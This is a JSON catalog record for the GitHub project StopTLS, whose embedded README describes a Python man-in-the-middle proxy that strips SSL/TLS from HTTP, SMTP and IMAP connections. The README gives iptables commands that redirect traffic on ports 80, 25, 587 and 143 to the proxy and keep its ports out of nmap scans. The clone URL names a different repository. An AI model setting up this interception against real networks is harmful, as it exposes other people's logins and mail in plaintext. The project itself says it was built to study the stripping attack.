{"id":13827298,"url":"https://github.com/mathewmarcus/stoptls","last_synced_at":"2026-01-17T07:58:38.650Z","repository":{"id":80112433,"uuid":"155810395","full_name":"mathewmarcus/StopTLS","owner":"mathewmarcus","description":"MitM proxy which performs opportunistic SSL/TLS stripping","archived":false,"fork":false,"pushed_at":"2019-11-05T17:11:08.000Z","size":60,"stargazers_count":16,"open_issues_count":1,"forks_count":4,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-04-24T13:41:49.279Z","etag":null,"topics":["aiohttp","asyncio","man-in-the-middle","python3","ssl","tls"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mathewmarcus.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-11-02T03:40:58.000Z","updated_at":"2022-11-04T14:57:22.000Z","dependencies_parsed_at":"2023-07-09T13:33:42.918Z","dependency_job_id":null,"html_url":"https://github.com/mathewmarcus/StopTLS","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mathewmarcus%2FStopTLS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mathewmarcus","download_url":"https://codeload.github.com/mathewmarcus/StopTLS/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":213898240,"owners_count":15654239,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aiohttp","asyncio","man-in-the-middle","python3","ssl","tls"],"created_at":"2024-08-04T09:01:53.599Z","updated_at":"2026-01-17T07:58:38.603Z","avatar_url":"https://github.com/mathewmarcus.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"42f9e068b6511bcbb47d6b2b273097da\"\u003e\u003c/a\u003e未分类"],"sub_categories":["\u003ca id=\"3bd67ee9f322e2c85854991c85ed6da0\"\u003e\u003c/a\u003e投毒\u0026\u0026Poisoning"],"readme":"# StopTLS\n\nStopTLS is a Man-in-the-Middle tool which performs opportunistic SSL/TLS stripping.\n\nCurrently it supports the following protocols: HTTP(S), SMTP, and IMAP\n\nIt requires Python \u003e= 3.5 (i.e. Python with support for async/await syntax), the [aiohttp](https://aiohttp.readthedocs.io/en/stable/) library, and the [Beautiful Soup](https://www.crummy.com/software/BeautifulSoup/) library for HTML parsing.\n\n## Usage\n```\nusage: main.py [--help] [-h [HTTP_PORT]] [-t [TCP_PORT]]\n               [-p {SMTP,IMAP} [{SMTP,IMAP} ...]]\n\nMitM proxy which performs opportunistic SSL/TLS stripping\n\noptional arguments:\n  --help                show this help message and exit\n  -h [HTTP_PORT], --http [HTTP_PORT]\n                        HTTP listen port [default: 10000]\n  -t [TCP_PORT], --tcp [TCP_PORT]\n                        TCP listen port [default: 49151]\n  -p {SMTP,IMAP} [{SMTP,IMAP} ...], --tcp-protocols {SMTP,IMAP} [{SMTP,IMAP} ...]\n                        supported TCP protocols\n```\n\n## Setup\n### 1. Download\n```bash\n$ git clone https://github.com/mathewmarcus/bruteforce-gpg.git\n```\n\n### 2. Install Dependencies\n``` bash\n$ pip install -r requirements.txt\n```\n\n### 3. Add `iptables` rules\nAdd rules to redirect and allow traffic to the ports specified by the `-h [HTTP_PORT], --http [HTTP_PORT]` and `-t [TCP_PORT], --tcp [TCP_PORT]` options. \n\n`stoptls` is setup to handle HTTP traffic on one port, and all other TCP traffic on another, as indicated by the CLI options.\n\nSo, assuming the following `stoptls` invocation:\n```bash\n$ python main.py --http 8080 --tcp 8081 --tcp-protocols SMTP IMAP\n```\n\n`iptables` rules would then need to be added to the `PREROUTING` chain in the `nat` table and the `INPUT` chain in the `filter` table, as shown below:\n\n#### `nat` table, `PREROUTING` chain\n##### HTTP\n```bash\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080\n```\n\n##### SMTP\n```bash\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 25 -j REDIRECT --to-port 8081\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-port 8081\n```\n\n##### IMAP\n```bash\n$ sudo iptables -t nat -A PREROUTING -p tcp --dport 143 -j REDIRECT --to-port 8081\n```\n\n#### `filter` table, `INPUT` chain\nAssuming a default `DROP` policy on this chain, add rules for the `HTTP_PORT` and/or `TCP_PORT`s specified earlier. So, for the above example:\n\n##### HTTP\n```bash\nsudo iptables -A INPUT -p tcp --dport 8080 -m conntrack --ctorigdstport 80 -j ACCEPT\n```\n\n##### SMTP\n```bash\nsudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 25 -j ACCEPT\nsudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 587 -j ACCEPT\n```\n\n##### IMAP\n```bash\nsudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 143 -j ACCEPT\n```\n\nWhy the `--ctorigdstport` option? This prevents the `stoptls` ports from being directly accessible (i.e. they will not appear in `nmap` scans).\n\n## TODO\nIt should be noted that `StopTLS` is very much a work in progress, and is essentially a POC at this point. In fact, currently, it doesn't log anything, but simply strips and proxies the connections. Below is a non-exhaustive list of features to be added. \n\n1. Logging\n2. Advanced configuration via an INI file\n3. Custom log traffic filters for all protocols via config file directives and/or user-supplied callables (functions, methods, etc)\n4. Support for additional, user-supplied protocols, by subclassing `stoptls.base.Proxy` and/or `stoptls.tcp.base.TCPProxyConn` abstract classes\n5. Support for more complex, non-standard HTTP login mechanisms\n6. Packaging and distribution via `pip` and `PyPi` repository\n7. Integration testing with Docker\n\n## Why?\nWhy create yet another SSLstripping tool when...\n1. tools such as `sslstrip` and `sslsplit` already exist\n2. HTTP Strict Transport Security (HSTS) has significantly limited the effectiveness of sslstripping attacks.\n\nThere are several answers:\n1. I wanted to better understand the sslstripping attack vector.\n2. I wanted to implement an sslstripping proxy using Python3 native asychronous support via `asyncio`, as opposed to an external library such as `twisted`.\n3. I wanted a tool which supported/could support any TCP protocol which uses opportunistic SSL/TLS, in addition to HTTP.\n4. I wanted a tool which was highly extensible and customizable.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmathewmarcus%2Fstoptls","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmathewmarcus%2Fstoptls","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmathewmarcus%2Fstoptls/lists"}